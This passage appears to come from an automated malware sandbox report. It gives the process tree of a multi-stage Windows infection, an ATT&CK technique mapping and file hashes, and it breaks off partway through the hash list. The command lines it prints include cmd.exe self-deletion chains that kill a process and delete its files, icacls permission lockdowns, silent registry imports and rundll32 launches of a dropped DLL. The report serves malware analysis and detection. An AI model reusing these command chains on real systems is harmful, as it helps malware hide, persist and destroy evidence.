                                                                                        PID:5496
                                                                                      • C:\Windows\SysWOW64\regedit.exe
                                                                                        regedit /s adj2.reg
                                                                                        4⤵
                                                                                        • Runs .reg file with regedit
                                                                                        PID:5528
                                                                                    • C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe
                                                                                      "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1120
                                                                                  • C:\Users\Admin\Documents\jY7mZMXVBCaYLDy_2BsFzytj.exe
                                                                                    "C:\Users\Admin\Documents\jY7mZMXVBCaYLDy_2BsFzytj.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4820
                                                                                    • C:\Users\Admin\AppData\Roaming\3258040.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\3258040.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5676
                                                                                    • C:\Users\Admin\AppData\Roaming\1504578.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\1504578.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5840
                                                                                  • C:\Users\Admin\Documents\jvT5x6eaCSeRCJIsTlb8ohCX.exe
                                                                                    "C:\Users\Admin\Documents\jvT5x6eaCSeRCJIsTlb8ohCX.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5072
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                                                      3⤵
                                                                                        PID:4184
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd
                                                                                          4⤵
                                                                                            PID:628
                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                              findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                                                              5⤵
                                                                                                PID:5276
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                Acre.exe.com k
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5656
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                  6⤵
                                                                                                    PID:5448
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5020
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:6136
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                          9⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          PID:5468
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                            10⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:1192
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                              11⤵
                                                                                                                PID:5916
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                                  12⤵
                                                                                                                    PID:5064
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                                      13⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:2496
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                                        14⤵
                                                                                                                          PID:4864
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                                            15⤵
                                                                                                                            • Drops startup file
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                            PID:4856
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                              16⤵
                                                                                                                                PID:6608
                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                          ping 127.0.0.1 -n 30
                                                                                                          5⤵
                                                                                                          • Runs ping.exe
                                                                                                          PID:5372
                                                                                                  • C:\Users\Admin\Documents\pCGH5bA28LjuAcyuKrK1hgNQ.exe
                                                                                                    "C:\Users\Admin\Documents\pCGH5bA28LjuAcyuKrK1hgNQ.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4104
                                                                                                    • C:\Users\Admin\AppData\Roaming\8780520.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\8780520.exe"
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5904
                                                                                                    • C:\Users\Admin\AppData\Roaming\7088216.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\7088216.exe"
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5248
                                                                                                  • C:\Users\Admin\Documents\13ho7bI_mLWjpp0lRnmPNBeP.exe
                                                                                                    "C:\Users\Admin\Documents\13ho7bI_mLWjpp0lRnmPNBeP.exe"
                                                                                                    2⤵
                                                                                                      PID:4452
                                                                                                      • C:\Users\Admin\Documents\13ho7bI_mLWjpp0lRnmPNBeP.exe
                                                                                                        "C:\Users\Admin\Documents\13ho7bI_mLWjpp0lRnmPNBeP.exe" -a
                                                                                                        3⤵
                                                                                                          PID:2496
                                                                                                      • C:\Users\Admin\Documents\aCOvxOKpIVVkA6fi4gdD4Jqr.exe
                                                                                                        "C:\Users\Admin\Documents\aCOvxOKpIVVkA6fi4gdD4Jqr.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:3796
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 660
                                                                                                          3⤵
                                                                                                          • Program crash
                                                                                                          PID:4144
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 672
                                                                                                          3⤵
                                                                                                          • Program crash
                                                                                                          PID:5056
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 660
                                                                                                          3⤵
                                                                                                          • Program crash
                                                                                                          PID:4924
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 696
                                                                                                          3⤵
                                                                                                          • Program crash
                                                                                                          PID:4784
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 992
                                                                                                          3⤵
                                                                                                          • Program crash
                                                                                                          PID:5384
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 1220
                                                                                                          3⤵
                                                                                                          • Program crash
                                                                                                          PID:2252
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 1260
                                                                                                          3⤵
                                                                                                          • Program crash
                                                                                                          PID:6024
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 1284
                                                                                                          3⤵
                                                                                                          • Program crash
                                                                                                          PID:5804
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 1176
                                                                                                          3⤵
                                                                                                          • Program crash
                                                                                                          PID:5608
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 1608
                                                                                                          3⤵
                                                                                                          • Program crash
                                                                                                          PID:5540
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 1400
                                                                                                          3⤵
                                                                                                          • Program crash
                                                                                                          PID:5104
                                                                                                      • C:\Users\Admin\Documents\tlSNzIORuZdsKzyAO8Pc_MpT.exe
                                                                                                        "C:\Users\Admin\Documents\tlSNzIORuZdsKzyAO8Pc_MpT.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:3920
                                                                                                        • C:\Users\Admin\Documents\tlSNzIORuZdsKzyAO8Pc_MpT.exe
                                                                                                          C:\Users\Admin\Documents\tlSNzIORuZdsKzyAO8Pc_MpT.exe
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4372
                                                                                                      • C:\Users\Admin\Documents\qf7jViqgVkEfXNOpiG2tmt53.exe
                                                                                                        "C:\Users\Admin\Documents\qf7jViqgVkEfXNOpiG2tmt53.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:3808
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:924
                                                                                                        • C:\Users\Admin\Documents\qf7jViqgVkEfXNOpiG2tmt53.exe
                                                                                                          C:\Users\Admin\Documents\qf7jViqgVkEfXNOpiG2tmt53.exe
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Drops file in Windows directory
                                                                                                          PID:4132
                                                                                                      • C:\Users\Admin\Documents\bPkD6HqFfWCJa7p7Nux5jjfj.exe
                                                                                                        "C:\Users\Admin\Documents\bPkD6HqFfWCJa7p7Nux5jjfj.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:3840
                                                                                                      • C:\Users\Admin\Documents\8q3DYoGBg5Mqvhuzsyud41Hm.exe
                                                                                                        "C:\Users\Admin\Documents\8q3DYoGBg5Mqvhuzsyud41Hm.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Checks processor information in registry
                                                                                                        PID:2944
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im 8q3DYoGBg5Mqvhuzsyud41Hm.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\8q3DYoGBg5Mqvhuzsyud41Hm.exe" & del C:\ProgramData\*.dll & exit
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5240
                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                            taskkill /im 8q3DYoGBg5Mqvhuzsyud41Hm.exe /f
                                                                                                            4⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:4792
                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                            timeout /t 6
                                                                                                            4⤵
                                                                                                            • Delays execution with timeout.exe
                                                                                                            PID:6000
                                                                                                      • C:\Users\Admin\Documents\WdfWZjcCC114O06sfUyTHHPu.exe
                                                                                                        "C:\Users\Admin\Documents\WdfWZjcCC114O06sfUyTHHPu.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks whether UAC is enabled
                                                                                                        PID:4656
                                                                                                      • C:\Users\Admin\Documents\mgddvnTr23Lx0Jps7DafvTMi.exe
                                                                                                        "C:\Users\Admin\Documents\mgddvnTr23Lx0Jps7DafvTMi.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4168
                                                                                                        • C:\Users\Admin\Documents\mgddvnTr23Lx0Jps7DafvTMi.exe
                                                                                                          "C:\Users\Admin\Documents\mgddvnTr23Lx0Jps7DafvTMi.exe"
                                                                                                          3⤵
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:6744
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6744 -s 1264
                                                                                                            4⤵
                                                                                                            • Program crash
                                                                                                            PID:5588
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 776
                                                                                                          3⤵
                                                                                                          • Program crash
                                                                                                          PID:5532
                                                                                                      • C:\Users\Admin\Documents\Qqf8R5vyZKI_wETkiAu3YE0N.exe
                                                                                                        "C:\Users\Admin\Documents\Qqf8R5vyZKI_wETkiAu3YE0N.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:4640
                                                                                                        • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                          C:\Users\Admin\AppData\Roaming\1234.exe 1234
                                                                                                          3⤵
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:424
                                                                                                          • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                            "{path}"
                                                                                                            4⤵
                                                                                                              PID:6684
                                                                                                        • C:\Users\Admin\Documents\DuVX1ksiLUnzDLvIb6mFI76y.exe
                                                                                                          "C:\Users\Admin\Documents\DuVX1ksiLUnzDLvIb6mFI76y.exe"
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:2288
                                                                                                          • C:\Users\Admin\Documents\DuVX1ksiLUnzDLvIb6mFI76y.exe
                                                                                                            "C:\Users\Admin\Documents\DuVX1ksiLUnzDLvIb6mFI76y.exe"
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Checks processor information in registry
                                                                                                            PID:5200
                                                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                        1⤵
                                                                                                        • Process spawned unexpected child process
                                                                                                        PID:3920
                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                          2⤵
                                                                                                          • Loads dropped DLL
                                                                                                          • Modifies registry class
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:1832
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:3912
                                                                                                      • C:\Windows\explorer.exe
                                                                                                        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                        1⤵
                                                                                                          PID:5328
                                                                                                        • C:\Windows\system32\rUNdlL32.eXe
                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                          1⤵
                                                                                                          • Process spawned unexpected child process
                                                                                                          PID:5452
                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                            2⤵
                                                                                                              PID:5468
                                                                                                          • C:\Windows\system32\rUNdlL32.eXe
                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                            1⤵
                                                                                                            • Process spawned unexpected child process
                                                                                                            PID:5700
                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                              2⤵
                                                                                                              • Loads dropped DLL
                                                                                                              • Modifies registry class
                                                                                                              PID:5716
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\175C.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\175C.exe
                                                                                                            1⤵
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:5476
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\175C.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\175C.exe
                                                                                                              2⤵
                                                                                                              • Adds Run key to start application
                                                                                                              PID:5552
                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                icacls "C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                3⤵
                                                                                                                • Modifies file permissions
                                                                                                                PID:5196
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\175C.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\175C.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                3⤵
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:6484
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\175C.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\175C.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                  4⤵
                                                                                                                  • Modifies extensions of user files
                                                                                                                  PID:7136
                                                                                                                  • C:\Users\Admin\AppData\Local\964d47d3-2057-46c1-a358-22a6a8cafa68\build2.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\964d47d3-2057-46c1-a358-22a6a8cafa68\build2.exe"
                                                                                                                    5⤵
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:6624
                                                                                                                    • C:\Users\Admin\AppData\Local\964d47d3-2057-46c1-a358-22a6a8cafa68\build2.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\964d47d3-2057-46c1-a358-22a6a8cafa68\build2.exe"
                                                                                                                      6⤵
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Checks processor information in registry
                                                                                                                      PID:4868
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\964d47d3-2057-46c1-a358-22a6a8cafa68\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                        7⤵
                                                                                                                          PID:6928
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            8⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5496
                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            taskkill /im build2.exe /f
                                                                                                                            8⤵
                                                                                                                            • Kills process with taskkill
                                                                                                                            PID:2504
                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                            timeout /t 6
                                                                                                                            8⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:6896
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                              1⤵
                                                                                                              • Drops file in Windows directory
                                                                                                              • Modifies Internet Explorer settings
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:5712
                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                              1⤵
                                                                                                              • Modifies Internet Explorer settings
                                                                                                              PID:696
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\35D2.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\35D2.exe
                                                                                                              1⤵
                                                                                                              • Loads dropped DLL
                                                                                                              • Checks processor information in registry
                                                                                                              PID:4784
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im 35D2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\35D2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                2⤵
                                                                                                                  PID:6336
                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                    taskkill /im 35D2.exe /f
                                                                                                                    3⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    PID:6508
                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                    timeout /t 6
                                                                                                                    3⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:6200
                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                1⤵
                                                                                                                • Modifies registry class
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:5256
                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                1⤵
                                                                                                                • Modifies Internet Explorer settings
                                                                                                                • Modifies registry class
                                                                                                                PID:2692
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\4FD3.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\4FD3.exe
                                                                                                                1⤵
                                                                                                                  PID:6052
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                  1⤵
                                                                                                                    PID:6160
                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                    1⤵
                                                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                    PID:6496
                                                                                                                  • C:\Windows\System32\SLUI.exe
                                                                                                                    "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
                                                                                                                    1⤵
                                                                                                                      PID:4192
                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                      1⤵
                                                                                                                      • Modifies registry class
                                                                                                                      PID:5112
                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                      1⤵
                                                                                                                      • Modifies registry class
                                                                                                                      PID:4432

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                    Persistence

                                                                                                                    Modify Existing Service

                                                                                                                    1
                                                                                                                    T1031

                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                    1
                                                                                                                    T1060

                                                                                                                    Defense Evasion

                                                                                                                    Modify Registry

                                                                                                                    4
                                                                                                                    T1112

                                                                                                                    Disabling Security Tools

                                                                                                                    1
                                                                                                                    T1089

                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                    1
                                                                                                                    T1497

                                                                                                                    File Permissions Modification

                                                                                                                    1
                                                                                                                    T1222

                                                                                                                    Install Root Certificate

                                                                                                                    1
                                                                                                                    T1130

                                                                                                                    Credential Access

                                                                                                                    Credentials in Files

                                                                                                                    4
                                                                                                                    T1081

                                                                                                                    Discovery

                                                                                                                    Query Registry

                                                                                                                    6
                                                                                                                    T1012

                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                    1
                                                                                                                    T1497

                                                                                                                    System Information Discovery

                                                                                                                    6
                                                                                                                    T1082

                                                                                                                    Peripheral Device Discovery

                                                                                                                    1
                                                                                                                    T1120

                                                                                                                    Remote System Discovery

                                                                                                                    1
                                                                                                                    T1018

                                                                                                                    Collection

                                                                                                                    Data from Local System

                                                                                                                    4
                                                                                                                    T1005

                                                                                                                    Command and Control

                                                                                                                    Web Service

                                                                                                                    1
                                                                                                                    T1102

                                                                                                                    Replay Monitor

                                                                                                                    Loading Replay Monitor...

                                                                                                                    Downloads

                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                      MD5

                                                                                                                      f7dcb24540769805e5bb30d193944dce

                                                                                                                      SHA1

                                                                                                                      e26c583c562293356794937d9e2e6155d15449ee

                                                                                                                      SHA256

                                                                                                                      6b88c6ac55bbd6fea0ebe5a760d1ad2cfce251c59d0151a1400701cb927e36ea

                                                                                                                      SHA512

                                                                                                                      cb5ad678b0ef642bf492f32079fe77e8be20c02de267f04b545df346b25f3e4eb98bb568c4c2c483bb88f7d1826863cb515b570d620766e52476c8ee2931ea94

                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                      MD5

                                                                                                                      7c7db0bb4b341029e3371bedde771d71

                                                                                                                      SHA1

                                                                                                                      52960b0d1804a45e914eef28acc11f5fff18527c

                                                                                                                      SHA256

                                                                                                                      9497bd6cc9461ce1beeb94668f6c8ab9847335dd5b12e0f23ef1efe35a52b739

                                                                                                                      SHA512

                                                                                                                      9d30a56d1422a095adc8c956c0a022944b89a08b8eeb723523f4ac26be6525d97a9965d5995830658d76d044922bc1957a4dc3ec13951c75243ad7560fb157b5

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS84AAC344\libcurl.dll
                                                                                                                      MD5

                                                                                                                      d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                      SHA1

                                                                                                                      028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                      SHA256

                                                                                                                      0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                      SHA512

                                                                                                                      857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS84AAC344\libcurlpp.dll
                                                                                                                      MD5

                                                                                                                      e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                      SHA1

                                                                                                                      b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                      SHA256

                                                                                                                      43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                      SHA512

                                                                                                                      9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS84AAC344\libgcc_s_dw2-1.dll
                                                                                                                      MD5

                                                                                                                      9aec524b616618b0d3d00b27b6f51da1

                                                                                                                      SHA1

